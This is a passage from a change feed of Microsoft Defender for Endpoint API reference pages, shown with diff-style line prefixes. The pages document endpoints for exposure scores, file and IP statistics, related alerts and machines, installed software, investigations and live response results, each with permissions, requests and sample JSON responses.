- "orgLastSeen": "2017-08-29T13:09:05Z"
-}
-```
security Get Exposure Score https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-exposure-score.md
- Title: Get exposure score
-description: Retrieves the organizational exposure score.
------- m365-security-- tier3-- must-keep--- Previously updated : 04/17/2024--
-# Get exposure score
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-Retrieves the organizational exposure score.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-||
-Application|Score.Read.All|'Read Threat and Vulnerability Management score'
-Delegated (work or school account)|Score.Read|'Read Threat and Vulnerability Management score'
-
-## HTTP request
-
-```http
-GET /api/exposureScore
-```
-
-## Request headers
-
-Name|Type|Description
-||
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK, with the exposure data in the response body.
-
-## Example
-
-### Request
-
-Here is an example of the request.
-
-```http
-GET https://api.security.microsoft.com/api/exposureScore
-```
-
-### Response
-
-Here is an example of the response.
-
-> [!NOTE]
-> The response list shown here may be truncated for brevity.
-
-```json
-{
- "@odata.context": "https://api.security.microsoft.com/api/$metadata#ExposureScore/$entity",
- "time": "2019-12-03T07:23:53.280499Z",
- "score": 33.491554051195706
-}
-```
-
-## See also
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Defender Vulnerability Management exposure score](/microsoft-365/security/defender-endpoint/tvm-exposure-score)
security Get File Information https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-file-information.md
- Title: Get file information API
-description: Learn how to use the Get file information API to get a file by Sha1, Sha256, or MD5 identifier in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 04/17/2024--
-# Get file information API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves a [File](files.md) by identifier Sha1, or Sha256
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md).
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|File.Read.All|'Read all file profiles'
-Delegated (work or school account)|File.Read.All|'Read all file profiles'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (For more information, see [Create and manage roles](../user-roles.md))
-
-## HTTP request
-
-```http
-GET /api/files/{id}
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and file exists - 200 OK with the [file](files.md) entity in the body. If file doesn't exist - 404 Not Found.
-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```http
-GET https://api.security.microsoft.com/api/files/4388963aaa83afe2042a46a3c017ad50bdcdafb3
-```
-
-### Response example
-
-Here's an example of the response.
-
-```json
-{
- "@odata.context": "https://api.security.microsoft.com/api/$metadata#Files/$entity",
- "sha1": "4388963aaa83afe2042a46a3c017ad50bdcdafb3",
- "sha256": "413c58c8267d2c8648d8f6384bacc2ae9c929b2b96578b6860b5087cd1bd6462",
- "globalPrevalence": 180022,
- "globalFirstObserved": "2017-09-19T03:51:27.6785431Z",
- "globalLastObserved": "2020-01-06T03:59:21.3229314Z",
- "size": 22139496,
- "fileType": "APP",
- "isPeFile": true,
- "filePublisher": "CHENGDU YIWO Tech Development Co., Ltd.",
- "fileProductName": "EaseUS MobiSaver for Android",
- "signer": "CHENGDU YIWO Tech Development Co., Ltd.",
- "issuer": "VeriSign Class 3 Code Signing 2010 CA",
- "signerHash": "6c3245d4a9bc0244d99dff27af259cbbae2e2d16",
- "isValidCertificate": false,
- "determinationType": "Pua",
- "determinationValue": "PUA:Win32/FusionCore"
-}
-```
security Get File Related Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-file-related-alerts.md
- Title: Get file-related alerts API
-description: Learn how to use the Get file-related alerts API to get a collection of alerts related to a given file hash in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get file-related alerts API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves a collection of alerts related to a given file hash.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-2. Only SHA-1 Hash Function is supported (not MD5 or SHA-256).
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Alert.Read.All|'Read all alerts'
-Application|Alert.ReadWrite.All|'Read and write all alerts'
-Delegated (work or school account)|Alert.Read|'Read alerts'
-Delegated (work or school account)|Alert.ReadWrite|'Read and write alerts'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (For more information, see [Create and manage roles](../user-roles.md))
-> - Response will include only alerts, associated with devices, that the user have access to, based on device group settings (For more information, see [Create and manage device groups](../machine-groups.md))
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/files/{id}/alerts
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and file exists - 200 OK with list of [alert](alerts.md) entities in the body. If file doesn't exist - 200 OK with an empty set.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/files/6532ec91d513acc05f43ee0aa3002599729fd3e1/alerts
-```
security Get File Related Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-file-related-machines.md
- Title: Get file-related machines API
-description: Learn how to use the Get file-related machines API to get a collection of machines related to a file hash in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get file-related machines API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves a collection of [Machines](machine.md) related to a given file hash.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-2. Only SHA-1 Hash Function is supported (not MD5 or SHA-256).
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Read.All|'Read all machine profiles'
-Application|Machine.ReadWrite.All|'Read and write all machine information'
-Delegated (work or school account)|Machine.Read|'Read machine information'
-Delegated (work or school account)|Machine.ReadWrite|'Read and write machine information'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (For more information, see [Create and manage roles](../user-roles.md))
-> - Response will include only devices, that the user have access to, based on device group settings (For more information, see [Create and manage device groups](../machine-groups.md))
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/files/{id}/machines
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and file exists - 200 OK with list of [machine](machine.md) entities in the body. If file doesn't exist - 200 OK with an empty set.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/files/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/machines
-```
security Get File Statistics https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-file-statistics.md
- Title: Get file statistics API
-description: Learn how to use the Get file statistics API to retrieve the statistics for the given file in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 04/17/2024--
-# Get file statistics API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves the statistics for the given file.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-2. The maximum value for `lookbackhours` is 720 Hours(30 days).
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|File.Read.All|'Read file profiles'
-Delegated (work or school account)|File.Read.All|'Read file profiles'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (For more information, see [Create and manage roles](../user-roles.md))
-
-## HTTP request
-
-```http
-GET /api/files/{id}/stats
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request URI parameters
-
-Name|Type|Description
-:|:|:
-lookBackHours|Int32|Defines the hours we search back to get the statistics. Defaults to 30 days. **Optional**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and file exists - 200 OK with statistical data in the body. If file does not exist - 404 Not Found.
-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```http
-GET https://api.security.microsoft.com/api/files/0991a395da64e1c5fbe8732ed11e6be064081d9f/stats?lookBackHours=48
-```
-
-### Response example
-
-Here's an example of the response.
-
-```json
-{
- "@odata.context": "https://api.security.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.InOrgFileStats",
- "sha1": "0991a395da64e1c5fbe8732ed11e6be064081d9f",
- "organizationPrevalence": 14850,
- "orgFirstSeen": "2019-12-07T13:44:16Z",
- "orgLastSeen": "2020-01-06T13:39:36Z",
- "globallyPrevalence": 705012,
- "globalFirstObserved": "2015-03-19T12:20:07.3432441Z",
- "globalLastObserved": "2020-01-06T13:39:36Z",
- "topFileNames": [
- "MREC.exe"
- ]
-}
-```
security Get Installed Software https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-installed-software.md
- Title: Get installed software
-description: Retrieves a collection of installed software related to a given device ID.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get installed software
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
----
-Retrieves a collection of installed software related to a given device ID.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application |Software.Read.All|'Read Threat and Vulnerability Management Software information'
-Delegated (work or school account)|Software.Read|'Read Threat and Vulnerability Management Software information'
-
-## HTTP request
-
-```http
-GET /api/machines/{machineId}/software
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK with the installed software information in the body.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/ac233fa6208e1579620bf44207c4006ed7cc4501/software
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
-"@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Software",
-"value": [
- {
-"id": "microsoft-_-internet_explorer",
-"name": "internet_explorer",
-"vendor": "microsoft",
-"weaknesses": 67,
-"publicExploit": true,
-"activeAlert": false,
-"exposedMachines": 42115,
-"impactScore": 46.2037163
- }
- ]
-}
-```
-
-## See also
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security Get Investigation Collection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-investigation-collection.md
- Title: List Investigations API
-description: Use this API to create calls related to get Investigations collection.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# List Investigations API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves a collection of [Investigations](investigation.md).
-
-Supports [OData V4 queries](https://www.odata.org/documentation/).
-
-The OData's `$filter` query is supported on: `startTime`, `id`, `state`, `machineId`, and `triggeringAlertId` properties.
-<br>```$stop``` with max value of 10,000
-<br>```$skip```
-
-See examples at [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md)
-
-## Limitations
-
-1. Maximum page size is 10,000.
-2. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md).
-
-|Permission type|Permission|Permission display name|
-|:|:|:|
-|Application|Alert.Read.All|`Read all alerts` |
-|Application|Alert.ReadWrite.All|`Read and write all alerts` |
-|Delegated (work or school account)|Alert.Read|`Read alerts` |
-|Delegated (work or school account)|Alert.ReadWrite|`Read and write alerts` |
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: `View Data`. For more information, see [Create and manage roles](../user-roles.md) for more information.
-
-## HTTP request
-
-```http
-GET https://api.securitycenter.microsoft.com/api/investigations
-```
-
-## Request headers
-
-|Name|Type|Description|
-|:|:|:|
-|Authorization|String|Bearer {token}. **Required**.|
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200, Ok response code with a collection of [Investigations](investigation.md) entities.
-
-## Example
-
-### Request example
-
-Here's an example of a request to get all investigations:
-
-```http
-GET https://api.securitycenter.microsoft.com/api/investigations
-```
-
-### Response example
-
-Here's an example of the response:
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Investigations",
- "value": [
- {
- "id": "63017",
- "startTime": "2020-01-06T14:11:34Z",
- "endTime": null,
- "state": "Running",
- "cancelledBy": null,
- "statusDetails": null,
- "machineId": "a69a22debe5f274d8765ea3c368d00762e057b30",
- "computerDnsName": "desktop-gtrcon0",
- "triggeringAlertId": "da637139166940871892_-598649278"
- }
- ...
- ]
-}
-```
security Get Investigation Object https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-investigation-object.md
- Title: Get Investigation object API
-description: Use this API to create calls related to get Investigation object
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get Investigation API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-## API description
-Retrieves specific [Investigation](investigation.md) by its ID.
-<br> ID can be the investigation ID or the investigation triggering alert ID.
--
-## Limitations
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
--
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Alert.Read.All|'Read all alerts'
-Application|Alert.ReadWrite.All|'Read and write all alerts'
-Delegated (work or school account) | Alert.Read | 'Read alerts'
-Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (See [Create and manage roles](../user-roles.md) for more information)
-
-## HTTP request
-
-```http
-GET https://api.securitycenter.microsoft.com/api/investigations/{id}
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization | String | Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200, Ok response code with an [Investigations](investigation.md) entity.
-
security Get Ip Related Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-ip-related-alerts.md
- Title: Get IP related alerts API
-description: Retrieve a collection of alerts related to a given IP address using Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get IP related alerts API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-Retrieves a collection of alerts related to a given IP address.
--
-## Limitations
-1. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.
--
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Defender for Endpoint APIs](apis-intro.md).
-
-|Permission type|Permission|Permission display name|
-|:|:|:|
-|Application|Alert.Read.All|`Read all alerts`|
-|Application|Alert.ReadWrite.All|`Read and write all alerts`|
-|Delegated (work or school account) | Alert.Read | `Read alerts`|
-|Delegated (work or school account) | Alert.ReadWrite | `Read and write alerts`|
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: `View Data`. For more information, see [Create and manage roles](../user-roles.md) for more information.
-> - Response includes only alerts, associated with devices, that the user have access to, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/ips/{ip}/alerts
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization | String | Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and IP exists - 200 OK with list of [alert](alerts.md) entities in the body. If IP address is unknown but valid, it returns an empty set.
-If the IP address is invalid, it returns HTTP 400.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/ips/10.209.67.177/alerts
-```
security Get Ip Statistics https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-ip-statistics.md
- Title: Get IP statistics API
-description: Get the latest stats for your IP using Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 04/17/2024--
-# Get IP statistics API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-Retrieves the statistics for the given IP.
-
-## Limitations
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-2. Maximum Value for Lookbackhours is 720 Hours(30days).
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Ip.Read.All|'Read IP address profiles'
-Delegated (work or school account)|Ip.Read.All|'Read IP address profiles'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
-> - The user needs to have at least the following role permission: 'View Data' (For more information, see [Create and manage roles](../user-roles.md))
-
-## HTTP request
-
-```http
-GET /api/ips/{ip}/stats
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request URI parameters
-
-Name|Type|Description
-:|:|:
-lookBackHours|Int32|Defines the hours we search back to get the statistics. Defaults to 30 days. **Optional**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and ip exists - 200 OK with statistical data in the body. IP is valid but doesn't exist - organizationPrevalence 0, IP is invalid - HTTP 400.
-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```http
-GET https://api.security.microsoft.com/api/ips/10.209.67.177/stats?lookBackHours=48
-```
-
-### Response example
-
-Here's an example of the response.
-
-```json
-{
- "@odata.context": "https://api.security.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.InOrgIPStats",
- "ipAddress": "10.209.67.177",
- "organizationPrevalence": 63515,
- "orgFirstSeen": "2017-07-30T13:36:06Z",
- "orgLastSeen": "2017-08-29T13:32:59Z"
-}
-```
-
-|Name|Description|
-|||
-|Organization prevalence|the distinct count of devices that opened network connection to this IP.|
-|Org first seen|the first connection for this IP in the organization.|
-|Org last seen|the last connection for this IP in the organization.|
-
-> [!NOTE]
-> This statistic information is based on data from the past 30 days.
security Get Live Response Result https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-live-response-result.md
- Title: Get live response results
-description: Learn how to retrieve a specific live response command result by its index.
--- NOCSH------ m365-security-- tier3-- must-keep--- Previously updated : 06/03/2021--
-# Get live response results
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves a specific live response command result by its index.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per
- hour.
-
-## Minimum requirements
-
-Before you can initiate a session on a device, make sure you fulfill the following requirements:
--- **Verify that you're running a supported version of Windows**.-
- Devices must be running one of the following versions of Windows
-
- - **Windows 11**
-
- - **Windows 10**
- - [Version 1909](/windows/whats-new/whats-new-windows-10-version-1909) or later
- - [Version 1903](/windows/whats-new/whats-new-windows-10-version-1903) with [KB4515384](https://support.microsoft.com/help/4515384/windows-10-update-kb4515384)
- - [Version 1809 (RS 5)](/windows/whats-new/whats-new-windows-10-version-1809) with [KB4537818](https://support.microsoft.com/help/4537818/windows-10-update-kb4537818)
- - [Version 1803 (RS 4)](/windows/whats-new/whats-new-windows-10-version-1803) with [KB4537795](https://support.microsoft.com/help/4537795/windows-10-update-kb4537795)
- - [Version 1709 (RS 3)](/windows/whats-new/whats-new-windows-10-version-1709) with [KB4537816](https://support.microsoft.com/help/4537816/windows-10-update-kb4537816)
-
- - **Windows Server 2019 - Only applicable for Public preview**
- - Version 1903 or (with [KB4515384](https://support.microsoft.com/help/4515384/windows-10-update-kb4515384)) later
- - Version 1809 (with [KB4537818](https://support.microsoft.com/help/4537818/windows-10-update-kb4537818))
-
- - **Windows Server 2022**
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more,
-including how to choose permissions, see [Get started](apis-intro.md).
-
-|Permission type|Permission|Permission display name|
-||||
-Application|Machine.Read.All|Read all machine profiles
-Application|Machine.ReadWrite.All|Read and write all machine information
-|Delegated (work or school account)|Machine.LiveResponse|Run live response on a specific machine|
-
-## HTTP request
-
-```HTTP
-GET https://api.securitycenter.microsoft.com/api/machineactions/{machine action
-id}/GetLiveResponseResultDownloadLink(index={command-index})
-```
-
-## Request headers
-
-|Name|Type|Description|
-||||
-|Authorization|String|Bearer {token}. Required.|
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200, Ok response code with object that holds the link to the command result in the *value* property. This link is valid for 30 minutes and should be used immediately for downloading the package to a local storage. An expired link can be re-created by another call, and there's no need to run live response again.
-
-*Runscript transcript properties:*
-
-|Property|Description|
-|||
-|script_name|Executed script name|
-|exit_code|Executed script exit code|
-|script_output|Executed script standard output|
-|script_errors|Executed script standard error output|
-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```HTTP
-GET https://api.securitycenter.microsoft.com/api/machineactions/988cc94e-7a8f-4b28-ab65-54970c5d5018/GetLiveResponseResultDownloadLink(index=0)
-```
-
-### Response example
-
-Here's an example of the response.
-
-HTTP/1.1 200 Ok
-
-Content-type: application/json
-
-```JSON
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Edm.String",
- "value": "https://core.windows.net/investigation-actions-data/ID/CustomPlaybookCommandOutput/4ed5e7807ad1fe59b00b664fe06a0f07?se=2021-02-04T16%3A13%3A50Z&sp=r&sv=2019-07-07&sr=b&sig=1dYGe9rPvUlXBPvYSmr6/OLXPY98m8qWqfIQCBbyZTY%3D"
-}
-```
-
-*File content:*
-
-```JSON
-{
- "script_name": "minidump.ps1",
- "exit_code": 0,
- "script_output": "Transcript started, output file is C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Temp\\PSScriptOutputs\\PSScript_Transcript_{TRANSCRIPT_ID}.txt
-C:\\windows\\TEMP\\OfficeClickToRun.dmp.zip\n51 MB\n\u0000\u0000\u0000",
- "script_errors":""
-}
-```
-
-## Related articles
--- [Get machine action API](get-machineaction-object.md)-- [Cancel machine action](cancel-machine-action.md)-- [Run live response](run-live-response.md)
security Get Machine By Id https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-machine-by-id.md
- Title: Get machine by ID API
-description: Learn how to use the Get machine by ID API to retrieve a machine by its device ID or computer name in Microsoft Defender for Endpoint.
